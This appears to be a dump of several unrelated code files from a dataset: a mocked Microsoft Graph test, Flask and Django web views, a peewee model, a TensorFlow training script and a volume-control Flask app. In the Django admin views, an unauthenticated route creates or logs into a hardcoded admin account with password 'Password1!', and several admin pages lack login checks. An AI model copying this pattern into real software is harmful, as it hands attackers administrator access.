func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
@patch('fn_microsoft_security_graph.lib.ms_graph_helper.OAuth2ClientCredentialsSession.get')
@patch('fn_microsoft_security_graph.lib.ms_graph_helper.OAuth2ClientCredentialsSession.authenticate')
def test_get_alert_details(self, mocked_requests_post, mocked_requests_get):
content = {
"access_token": "fake_access_token"
}
content2 = {
"alert_details": {
"details": 1234
}
}
mocked_requests_post.return_value = generate_response(content, 200)
mocked_requests_get.return_value = generate_response(content2, 200)
ms_helper = MSGraphHelper("ms_token_url", "ms_graph_url", "tenant_id1234", "client_id1234", "client_secret1234")
response = ms_helper.ms_graph_session.get("{}/security/alerts/{}".format("ms_graph_url", "1223456788"))
assert response.json() == content2
|
996,195 | 3c9676d9c012c9f1e2cc2b4e095044188a6eaeb1 | from flask_restful import Resource
from flask import request
from models.schema.user import UserSchema
from models.user import UserModel
user_schema = UserSchema(many=False)
def get_param():
data = request.get_json(force=False)
if data is None:
data = request.form
return data
class UserResource (Resource):
def get(self, name):
user = UserModel.get_user(name)
if not user:
return {
'message': 'username not exist!'
}, 403
return {
'message': '',
'user': user_schema.dump(user).data
}
def post(self, name):
result = user_schema.load(get_param())
if len(result.errors) > 0:
return result.errors, 433
user = UserModel(name, result.data['email'], result.data['password'])
user.add_user()
return {
'message': 'Insert user success',
'user': user_schema.dump(user).data
}
def put(self, name):
result = user_schema.load(get_param())
if len(result.errors) > 0:
return result.errors, 433
user = UserModel.get_user(name)
if not user:
return {
'message': 'username not exist!'
}, 403
user.email = result.data['email']
user.password = result.data['password']
user.update_user()
return {
'message': 'Update user success',
'user': user_schema.dump(user).data
}
def delete(self, name):
user = UserModel.get_user(name)
if not user:
return {
'message': 'username not exist!'
}, 403
user.delete_user()
return {
'message': 'Delete done!'
}
class UsersResource(Resource):
def get(self):
return {
'message': '',
'users': user_schema.dump(UserModel.get_all_user(), True).data
}
|
996,196 | 311d8783ae77b7b191ade3c4d0cd113779b63b7f | from peewee import CharField, DateTimeField, BooleanField, SmallIntegerField, DeferredForeignKey
from .base_model import BaseModel
from datetime import datetime
class Todo(BaseModel):
note = DeferredForeignKey("Note", null=False, on_delete='cascade', backref='todos', column_name="note_id")
title = CharField(default="")
content = CharField(default="")
remark = CharField(default="")
finished_at = DateTimeField()
is_finished = BooleanField(default=False)
group = CharField()
priority = SmallIntegerField(default=0)
def set_finished(self, is_finished=True):
self.is_finished = is_finished
if is_finished:
self.finished_at = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
else:
self.finished_at = None
self.save()
@classmethod
def set_group(cls, todos, group_name):
if not group_name:
return False
if isinstance(todos, list):
for item in todos:
item.group = group_name
item.save()
elif isinstance(todos, Todo):
todos.group = group_name
todos.save()
else:
raise RuntimeError('unexpected todos param')
@classmethod
def get_groups(cls, note_id=None):
query = Todo.select(Todo.group).distinct()
if note_id:
query = query.where(Todo.note_id == note_id)
groups = [item.group for item in query]
if len(groups):
return groups
else:
return [_("todo.no_group")]
class Meta:
table_name = "todos"
|
996,197 | 1ad11c444e4f3c003b7132e0551b7650e3b6ba54 | ##### E-Commerce Website Clone
##### Mason Brewer
##### April 5th, 2019
from django.shortcuts import render, redirect
from time import gmtime, strftime
import random, datetime, bcrypt
from .models import *
from django.contrib import messages
from decimal import Decimal
from apps.UIApp.models import User, Order
# GET: Loads the login page for workers.
def loginPage(request):
if request.session.get("adminLoggedIn"):
return redirect("/admin/orders")
else:
return render(request, 'AdminApp/login.html')
# POST: Processes a login request.
def loginProcess(request):
if request.method == "GET":
return redirect("/login")
if request.method == "POST":
errors = Admin.objects.loginValidator(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value, extra_tags=key)
return redirect("/admin/login")
else:
request.session['currentAdminId'] = Admin.objects.get(email = request.POST['email']).id
request.session["adminLoggedIn"] = True
return redirect("/admin/orders")
# POST: Processes a login with parameters, a special case use.
def paramLogin(request, pHash):
pass
# GET: Loads list of orders.
def ordersPage(request):
if not request.session["adminLoggedIn"]:
return redirect("/admin/login")
else:
context = {
"admin": Admin.objects.get(id = request.session["currentAdminId"]),
"orders": Order.objects.all()
}
return render(request, 'AdminApp/orders.html', context)
# GET: Loads list of products.
def productsPage(request):
if not request.session["adminLoggedIn"]:
return redirect("/admin/login")
else:
context = {
"admin": Admin.objects.get(id = request.session["currentAdminId"]),
"products": Product.objects.all()
}
return render(request, 'AdminApp/products.html', context)
# POST: Deletes product.
def productDelete(request):
pass
# GET: Loads a specific order.
def orderViewPage(request, orderID):
pass
# POST: Changes the status of the order.
def changeStatus(request):
pass
# GET: Loads the create page for a product.
def productNewPage(request):
context = {
"categories": Category.objects.all()
}
return render(request, 'AdminApp/newProduct.html', context)
# POST: Submits the new product.
def productNewProcess(request):
if request.method == "GET":
return redirect("/admin/product/new")
if request.method == "POST":
postCopy = request.POST.copy()
if postCopy["price"]:
postCopy["price"] = Decimal(postCopy["price"])
errors = Product.objects.newValidator(postCopy)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value, extra_tags = key)
return redirect("/admin/product/new")
else:
if postCopy["category"]:
catInput = Category.objects.get(id = postCopy["category"])
Product.objects.create(name = postCopy["name"], description = postCopy["description"],
price = postCopy["price"], imageURL = postCopy["imageURL"],
category = catInput)
return redirect("/admin/products")
# GET: Loads the edit page for a product.
def productEditPage(request):
return render(request, 'AdminApp/editProduct.html')
# POST: Submits the edit of a product.
def productEditProcess(request):
pass
# POST: Add a new Category.
def categoryNewProcess(request):
if request.method == "GET":
return redirect("/admin/product/new")
if request.method == "POST":
errors = Category.objects.newValidator(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value, extra_tags=key)
return redirect("/admin/product/new")
else:
Category.objects.create(title = request.POST["title"])
return redirect("/admin/product/new")
# GET: Shows all of the administrator accounts (subject to change).
def adminsPage(request):
if not request.session["adminLoggedIn"]:
return redirect("/admin/login")
else:
context = {
"admin": Admin.objects.get(id = request.session["currentAdminId"]),
"admins": Admin.objects.all()
}
return render(request, 'AdminApp/admins.html', context)
# GET: Loads admin add page.
def adminNewPage(request):
return render(request,'AdminApp/newAdmin.html')
# POST: Submits the new admin.
def adminNewProcess(request):
if request.method == "GET":
return redirect("/admin/admin/new")
if request.method == "POST":
errors = Admin.objects.registerValidator(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value, extra_tags=key)
return redirect("/admin/admin/new")
else:
newPassHash = bcrypt.hashpw(request.POST["password"].encode(), bcrypt.gensalt())
newAdmin = Admin.objects.create(accessLevel = int(request.POST["accessLevel"]),
firstName = request.POST["firstName"], lastName = request.POST["lastName"],
email = request.POST["email"], passHash = newPassHash.decode())
request.session["currentAdminId"] = newAdmin.id
request.session["adminLoggedIn"] = True
return redirect("/admin/admins")
# POST: Logging an administrator out.
def logout(request):
request.session["adminLoggedIn"] = False
return redirect("/admin/login")
# POST: Creating the first admin.
def admumsTheWord(request):
if len(Admin.objects.filter(firstName = "admum").__dict__) == 0:
pH = bcrypt.hashpw("Password1!".encode(), bcrypt.gensalt())
newAdmum = Admin.objects.create(accessLevel=3, firstName="admum", lastName="isTheWord",
email="secret@password.shh", passHash=pH.decode())
request.session["adminLoggedIn"] = True
request.session["currentAdminId"] = newAdmum.id
print("MAKING ACCOUNT")
return redirect("/admin/orders")
else:
print("ACCOUNT EXISTS")
admum = Admin.objects.get(firstName = "admum")
print(admum.email)
request.session["adminLoggedIn"] = True
request.session["currentAdminId"] = admum.id
return redirect("/admin/orders")
|
996,198 | 0b56d8186a412c96ebe75713cde18bf5e89a3de4 | import os
from datetime import datetime
import time
import json
import numpy as np
import tensorflow as tf
from tensorflow import keras
from netTrain.ResNet.net_model import ResNet50V2, ResNet50V2_fc
# from argoPrepare.load_tfrecord_argo import input_fn
from argoData.load_tfrecord_argo import input_fn
# from utils_custom.load_tfrecord import input_fn
from utils_custom.utils_argo import ADE_1S, FDE_1S, ADE_2S, FDE_2S, ADE_3S, FDE_3S, ADE_FDE_loss, metrics_array
from netTrain.Boost.boost_fast_sampler import HardSampleReservoir
from hparms import *
# ==============================================================================
# -- Constants -----------------------------------------------------------------
# ==============================================================================
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0" # specify which GPU(s) to be used
# ==============================================================================
# -- Function -----------------------------------------------------------------
# ==============================================================================
def lr_schedule(epoch):
"""Learning Rate Schedule
Learning rate is scheduled to be reduced after 80, 120, 160, 180 epochs.
Called automatically every epoch as part of callbacks during training.
# Arguments
epoch (int): The number of epochs
# Returns
lr (float32): learning rate
"""
lr = 1e-3
if epoch > 30:
lr *= 0.5e-3
elif epoch > 25:
lr *= 1e-3
elif epoch > 20:
lr *= 1e-2
elif epoch > 10:
lr *= 1e-1
print('Learning rate: ', lr)
return lr
def main():
keras.backend.clear_session()
sess = tf.Session()
logtime = datetime.now().strftime("%Y%m%d-%H%M%S")
# logdir = "../../../logs/Boost/scalars/" + logtime
# # Tensorboard
# tensorboard_callback = keras.callbacks.TensorBoard(log_dir=logdir)
# ==============================================================================
# -- Dataset -----------------------------------------------------------------
# ==============================================================================
data_dir = ['../../../data/argo/forecasting/train/tf_record_4_channel/']
train_dataset = input_fn(is_training=True, data_dir=data_dir, batch_size=BATCH_SIZE, num_epochs=NUM_EPOCHS)
iterator = train_dataset.make_one_shot_iterator()
input_batch, gt_batch = iterator.get_next()
data_dir = ['../../../data/argo/forecasting/val/tf_record_4_channel/']
valid_dataset = input_fn(is_training=False, data_dir=data_dir, batch_size=BATCH_SIZE, num_epochs=NUM_EPOCHS)
# ==============================================================================
# -- Model -----------------------------------------------------------------
# ==============================================================================
# model = ResNet50V2(include_top=True, weights=None,
# input_shape=(IMAGE_WIDTH, IMAGE_HEIGHT, NUM_CHANNELS),
# classes=FUTURE_TIME_STEP*2)
model = ResNet50V2_fc(weights=None,
input_img_shape=(IMAGE_WIDTH, IMAGE_HEIGHT, NUM_CHANNELS),
input_ptraj_shape=(PAST_TIME_STEP*2, ),
node_num=2048,
classes=FUTURE_TIME_STEP*2)
model.load_weights('../../../logs/Boost/checkpoints/20190926-115346weights012.h5')
# model = keras.utils.multi_gpu_model(model, gpus=4)
model.compile(optimizer=keras.optimizers.Adam(lr=lr_schedule(0)),
loss=ADE_FDE_loss,
metrics=[ADE_1S, ADE_2S, ADE_3S, FDE_1S, FDE_2S, FDE_3S])
# ==============================================================================
# -- Training -----------------------------------------------------------------
# ==============================================================================
reservior = HardSampleReservoir()
min_loss = 10000
for epoch in range(NUM_EPOCHS):
print(f"Epoch: {epoch}/{NUM_EPOCHS}")
model.optimizer.lr = lr_schedule(epoch)
start_time = time.time()
re = [0, 0] # result of training loss and metrics
for step in range(STEPS_PER_EPOCH):
dt, gt = sess.run([input_batch, gt_batch])
if epoch < NORMAL_TRAIN_EPOCH:
out = model.train_on_batch(dt, gt)
re = [re[0] + np.array(out)*gt.shape[0], re[1] + gt.shape[0]]
else:
reservior.push_to_buffer(dt, gt)
for i in range(1+HARD_SAMPLE_RATIO): # n*Hard samples + 1*normal samples
dt, gt = reservior.pop()
if gt.size:
out = model.train_on_batch(dt, gt)
re = [re[0] + np.array(out)*gt.shape[0], re[1] + gt.shape[0]]
# Find the hard samples
y_pred = model.predict(dt)
loss = metrics_array(gt, y_pred)
ind = []
for ii in range(loss.shape[0]):
if loss[ii, 0] > valid_scores[1] or loss[ii, 1] > valid_scores[2] \
or loss[ii, 2] > valid_scores[3] or loss[ii, 3] > valid_scores[4] \
or loss[ii, 4] > valid_scores[5] or loss[ii, 5] > valid_scores[6]:
ind.append(ii)
# Push the hard samples into reservoir
reservior.append(dt, gt, ind)
# Evaluate the validation dataset
valid_scores = model.evaluate(valid_dataset, verbose=0, steps=int(40127/BATCH_SIZE))
# Print the training result
print(f"--- Time: {int(time.time()-start_time)} second ---")
for i, score in enumerate(re[0]):
print(f"--{model.metrics_names[i]}: {score/re[1]}", end=' ')
print("")
for i, score in enumerate(valid_scores):
if i == 0:
print(f"--valid_loss: {valid_scores[0]}", end=' ')
else:
print(f"--{model.metrics_names[i]}: {score}", end=' ')
print("")
# Save the best model according to validation result
if valid_scores[0] < min_loss:
if epoch >= NORMAL_TRAIN_EPOCH:
model.save_weights(f"../../../logs/Boost/checkpoints/{logtime}weights{epoch:03d}.h5")
min_loss = valid_scores[0]
print(f"reservoir size: {reservior.data_size}")
if __name__ == '__main__':
main()
|
996,199 | e5d80ef4e2fb311239260aad86a51ba018e2886e | from flask import Flask, render_template
import requests
import subprocess
app = Flask(__name__)
@app.route('/')
def root():
name = "Hello World"
return render_template('root.html', title='Home')
@app.route('/volume/vol_up')
def vol_up():
subprocess.Popen('SetVol.exe +10', shell=True)
return render_template('success.html', title='vol_up Success')
@app.route('/volume/vol_down')
def vol_down():
subprocess.Popen('SetVol.exe -10', shell=True)
return render_template('success.html', title='vol_down Success')
@app.route('/volume/vol_mute')
def vol_mute():
subprocess.Popen('SetVol.exe mute', shell=True)
return render_template('success.html', title='vol_mute Success')
@app.route('/volume/vol_unmute')
def vol_unmute():
subprocess.Popen('SetVol.exe unmute', shell=True)
return render_template('success.html', title='vol_unmuteSuccess')
if __name__ == "__main__":
app.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.